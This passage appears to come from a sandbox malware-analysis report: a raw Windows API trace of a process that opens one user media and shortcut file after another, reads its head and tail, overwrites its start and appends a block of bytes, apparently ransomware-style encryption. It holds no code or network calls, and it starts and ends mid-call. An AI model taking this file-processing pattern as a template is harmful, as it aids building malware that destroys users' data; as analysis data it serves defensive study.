lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2b1f2d0*=0x60e, lpOverlapped=0x0) returned 1 [0161.511] CloseHandle (hObject=0x1d8) returned 1 [0161.511] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0161.972] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0161.973] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x85 [0161.973] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0161.973] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.973] ReleaseMutex (hMutex=0x168) returned 1 [0161.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows Live Gallery.url", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0161.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows Live Gallery.url", cchWideChar=24, lpMultiByteStr=0x1f8fd5c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Windows Live Gallery.url", lpUsedDefaultChar=0x0) returned 24 [0161.973] ReadFile (in: hFile=0x204, lpBuffer=0x2673210, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2673210*, lpNumberOfBytesRead=0x2b1f2bc*=0x85, lpOverlapped=0x0) returned 1 [0161.975] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0161.975] WriteFile (in: hFile=0x204, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x60d, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2b1f2d0*=0x60d, lpOverlapped=0x0) returned 1 [0161.975] CloseHandle (hObject=0x204) returned 1 [0161.975] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Dk2_EzNhKbGEIsxH\\9dHpE5\\JpQsFUCehGS_jlYE5J6.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dk2_eznhkbgeisxh\\9dhpe5\\jpqsfucehgs_jlye5j6.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0161.976] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0161.977] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x69cb [0161.977] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0161.977] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.977] ReleaseMutex (hMutex=0x168) returned 1 [0161.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JpQsFUCehGS_jlYE5J6.mp3", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0161.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JpQsFUCehGS_jlYE5J6.mp3", cchWideChar=23, lpMultiByteStr=0x1f88bcc, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JpQsFUCehGS_jlYE5J6.mp3", lpUsedDefaultChar=0x0) returned 23 [0161.977] ReadFile (in: hFile=0x204, lpBuffer=0x25abb78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x25abb78*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0161.984] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x59cb [0161.984] ReadFile (in: hFile=0x204, lpBuffer=0x286da88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0161.985] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x59cb [0161.985] WriteFile (in: hFile=0x204, lpBuffer=0x2667868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0161.985] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0161.985] WriteFile (in: hFile=0x204, lpBuffer=0x286da88*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0161.985] CloseHandle (hObject=0x204) returned 1 [0161.986] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Dk2_EzNhKbGEIsxH\\f73fI\\8vspALAO.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dk2_eznhkbgeisxh\\f73fi\\8vspalao.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0161.986] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0161.986] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x5399 [0161.986] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0161.986] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.986] ReleaseMutex (hMutex=0x168) returned 1 [0161.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8vspALAO.m4a", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0161.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8vspALAO.m4a", cchWideChar=12, lpMultiByteStr=0x1f7346c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8vspALAO.m4a", lpUsedDefaultChar=0x0) returned 12 [0161.986] ReadFile (in: hFile=0x204, lpBuffer=0x286da88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0161.987] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x4399 [0161.987] ReadFile (in: hFile=0x204, lpBuffer=0x286da88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0161.988] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x4399 [0161.988] WriteFile (in: hFile=0x204, lpBuffer=0x25abb78*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x25abb78*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0161.988] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0161.988] WriteFile (in: hFile=0x204, lpBuffer=0x286da88*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0161.988] CloseHandle (hObject=0x204) returned 1 [0161.989] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Dk2_EzNhKbGEIsxH\\kEGn-7rcTvps-n\\MzkSL4h7EkG_Utj.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dk2_eznhkbgeisxh\\kegn-7rctvps-n\\mzksl4h7ekg_utj.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0161.989] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0161.990] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xa23c [0161.990] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0161.990] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.990] ReleaseMutex (hMutex=0x168) returned 1 [0161.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MzkSL4h7EkG_Utj.mp3", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0161.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MzkSL4h7EkG_Utj.mp3", cchWideChar=19, lpMultiByteStr=0x1f88ba4, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MzkSL4h7EkG_Utj.mp3", lpUsedDefaultChar=0x0) returned 19 [0161.990] ReadFile (in: hFile=0x204, lpBuffer=0x284f968, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x284f968*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0161.992] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x923c [0161.992] ReadFile (in: hFile=0x204, lpBuffer=0x286da88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0161.992] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x923c [0161.992] WriteFile (in: hFile=0x204, lpBuffer=0x2667868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0161.993] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0161.993] WriteFile (in: hFile=0x204, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0161.993] CloseHandle (hObject=0x204) returned 1 [0161.993] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eZr6.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ezr6.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0161.994] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0161.994] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x14589 [0161.994] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0161.994] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.994] ReleaseMutex (hMutex=0x168) returned 1 [0161.994] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eZr6.m4a", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0161.994] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eZr6.m4a", cchWideChar=8, lpMultiByteStr=0x1f7346c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eZr6.m4a", lpUsedDefaultChar=0x0) returned 8 [0161.995] ReadFile (in: hFile=0x204, lpBuffer=0x284f968, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x284f968*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0161.996] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x13589 [0161.996] ReadFile (in: hFile=0x204, lpBuffer=0x286da88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0161.996] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x13589 [0161.996] WriteFile (in: hFile=0x204, lpBuffer=0x25abb78*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x25abb78*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0161.997] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0161.997] WriteFile (in: hFile=0x204, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0161.997] CloseHandle (hObject=0x204) returned 1 [0161.998] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\5KV2W3L69- l7u9zN7\\rVWU91.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\5kv2w3l69- l7u9zn7\\rvwu91.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0161.998] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0161.999] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xefe7 [0161.999] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0161.999] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.999] ReleaseMutex (hMutex=0x168) returned 1 [0161.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rVWU91.png", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0161.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rVWU91.png", cchWideChar=10, lpMultiByteStr=0x1f735ec, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rVWU91.png", lpUsedDefaultChar=0x0) returned 10 [0161.999] ReadFile (in: hFile=0x204, lpBuffer=0x284f968, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x284f968*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0162.001] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xdfe7 [0162.001] ReadFile (in: hFile=0x204, lpBuffer=0x286da88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0162.001] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xdfe7 [0162.001] WriteFile (in: hFile=0x204, lpBuffer=0x2667868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0162.002] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0162.002] WriteFile (in: hFile=0x204, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0162.003] CloseHandle (hObject=0x204) returned 1 [0162.003] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\R RKDuxP8rCXB2GrI6_.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\r rkduxp8rcxb2gri6_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0162.004] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0162.004] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x13332 [0162.004] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0162.004] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0162.004] ReleaseMutex (hMutex=0x168) returned 1 [0162.004] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="R RKDuxP8rCXB2GrI6_.gif", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0162.004] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="R RKDuxP8rCXB2GrI6_.gif", cchWideChar=23, lpMultiByteStr=0x1f88d34, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R RKDuxP8rCXB2GrI6_.gif", lpUsedDefaultChar=0x0) returned 23 [0162.005] ReadFile (in: hFile=0x204, lpBuffer=0x284f968, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x284f968*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0162.006] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x12332 [0162.006] ReadFile (in: hFile=0x204, lpBuffer=0x286da88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0162.006] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x12332 [0162.006] WriteFile (in: hFile=0x204, lpBuffer=0x25abb78*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x25abb78*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0162.007] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0162.007] WriteFile (in: hFile=0x204, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0162.008] CloseHandle (hObject=0x204) returned 1 [0162.009] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\iFq7qSEHvHQN WmzmOe\\4nI5KS7nwF.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ifq7qsehvhqn wmzmoe\\4ni5ks7nwf.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0162.009] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0162.009] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xf3ae [0162.010] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0162.010] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0162.010] ReleaseMutex (hMutex=0x168) returned 1 [0162.010] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="4nI5KS7nwF.mp4", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0162.010] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="4nI5KS7nwF.mp4", cchWideChar=14, lpMultiByteStr=0x1f735ec, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="4nI5KS7nwF.mp4", lpUsedDefaultChar=0x0) returned 14 [0162.010] ReadFile (in: hFile=0x204, lpBuffer=0x284f968, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x284f968*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0162.011] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xe3ae [0162.297] ReadFile (in: hFile=0x204, lpBuffer=0x286da88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0162.297] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xe3ae [0162.297] WriteFile (in: hFile=0x204, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0x1588, 